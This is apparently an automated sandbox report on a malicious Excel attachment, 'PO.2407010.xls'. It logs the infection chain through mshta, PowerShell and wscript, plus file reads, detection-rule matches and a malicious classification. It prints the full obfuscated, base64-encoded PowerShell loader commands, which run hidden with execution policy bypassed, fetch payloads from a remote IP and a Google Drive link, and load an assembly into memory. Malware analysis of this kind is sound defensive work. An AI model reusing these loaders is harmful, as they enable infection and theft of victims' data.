1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE89AC00DD5_2_000007FE89AC00DD
          Source: PO.2407010.xlsOLE indicator, VBA macros: true
          Source: PO.2407010.xlsStream path 'MBD011FA3F1/\x1Ole' : https://acesso.run/ll2rdE?&moustache=historical&spade=lonely&fatherz`=k_bK3L-u,1'.0lMVVsOr[>iOPBfm.$K6UO3TErtG3wgAw5xUxRidTFIc65Wm0DCGIqio1xcJCWiFa6jtMHmSgi5uq4Yrn73gIihluEWjxyiBPKSMJpFR4jjfdcyPEfQmT18a5ZOrPyUIDypOO0TDwoTnCV7TE95whMXvIFykfK6NfVoAZxCbADSnAOpP7WjHiDvrcElX5i3GxD3gltolGXgrY7Bk086emOkaysPl6rBA0i9l6pm6Q0AFIPtN<KWC!Kz)b_'yk}Eb
          Source: 20430000.0.drStream path 'MBD011FA3F1/\x1Ole' : https://acesso.run/ll2rdE?&moustache=historical&spade=lonely&fatherz`=k_bK3L-u,1'.0lMVVsOr[>iOPBfm.$K6UO3TErtG3wgAw5xUxRidTFIc65Wm0DCGIqio1xcJCWiFa6jtMHmSgi5uq4Yrn73gIihluEWjxyiBPKSMJpFR4jjfdcyPEfQmT18a5ZOrPyUIDypOO0TDwoTnCV7TE95whMXvIFykfK6NfVoAZxCbADSnAOpP7WjHiDvrcElX5i3GxD3gltolGXgrY7Bk086emOkaysPl6rBA0i9l6pm6Q0AFIPtN<KWC!Kz)b_'yk}Eb
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2254
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2254
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2254Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2254
          Source: Process Memory Space: powershell.exe PID: 4092, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 3588, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winXLS@34/43@8/6
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\20430000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeMutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRA331.tmpJump to behavior
          Source: PO.2407010.xlsOLE indicator, Workbook stream: true
          Source: 20430000.0.drOLE indicator, Workbook stream: true
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............0.q.......q.....@@................D.....@@......H@................D......3D.....................@@..............Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(D.......................q.....}..w......q.......D.......D......1D.....(.P.....P.......X.......................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................q.......q.....}..w..............D.......D......1D.....(.P.......D......3D.....................@...............Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................L.l....}..w....@.......\.F.......D.............(.P.....P.......X.......................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@.......}..w..............r......L.l......q.....(.P.....P.......X.......................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................L.l....}..w....@.......\.F.......D.............(.P.....P.......X.......................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@.......}..w..............r......L.l......q.....(.P.....P.......X.......................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1...r......L.l......q.....(.P.....P.......X............... .......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .d.E.V.i.c.E.C.R.E.d.e.N.t.i.a.L.D.e.P.l.O.y.m.e.n.T.(.P.....P.......X...............8.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.....P.......X...............8.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@.......}..w..............r......L.l......q.....(.P.....P.......X.......................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...X...............F.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@.......}..w..............r......L.l......q.....(.P.....P.......X...............l.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......@.......}..w..............r......L.l......q.....(.P.....P.......X.......................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...q.....}..w..............D.......D......1D.....(.P.......D......3D.....x............... ...............Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(D.......................q.....}..w......q.......D.......D......1D.....(.P.....................x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............0.q.......q.....P.................D.....P.......X.................D......3D.....h...............P...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(D.......................q.....}..w......q.......D.......D......1D.....(.P.....................h...............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................q.......q.....}..w..............D.......D......1D.....(.P.......D......3D.....................PM..............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w....PM......\.F.......D.............(.P.....................(...............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................PM......}..w............0#.........l............(.P.....................................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w....PM......\.F.......D.............(.P.....................(...............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................PM......}..w............0#.........l............(.P.....................................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.0#.........l............(.P............................. .......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .d.E.V.i.c.E.C.R.E.d.e.N.t.i.a.L.D.e.P.l.O.y.m.e.n.T.(.P.............................8.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.............................8.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................PM......}..w............0#.........l............(.P.....................................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...................F.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................PM......}..w............0#.........l............(.P.............................l.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......PM......}..w............0#.........l............(.P.....................................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...q.....}..w..............D.......D......1D.....(.P.......D......3D......................b..............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(D.......................q.....}..w......q.......D.......D......1D.....(.P.....4.......<.......................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................b......}..w............8.D.....8.D.....@"D.....(.P.....4.......<.......................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................p.Xk....}..w.....b......\.F.......D.............(.P.....4.......<.......8...............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.8.1.......Xk.....c{.....(.P.....4.......<...............$.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................p.Xk....}..w.....b......\.F.......D.............(.P.....4.......<.......8...............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................b......}..w............0mk.......Xk.....c{.....(.P.....4.......<.......................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................b......}..w............0mk.......Xk.....c{.....(.P.....4.......<.......................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................b......}..w............0mk.......Xk.....c{.....(.P.....4.......<.......................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................b......}..w............0mk.......Xk.....c{.....(.P.....4.......<...............X.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........b......}..w............0mk.......Xk.....c{.....(.P.....4.......<.......................................
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.cmdline"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7224.tmp" "c:\Users\user\AppData\Local\Temp\brij5btb\CSCD2DC83D8CE34483988FC31C99ACC1C8B.TMP"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs"
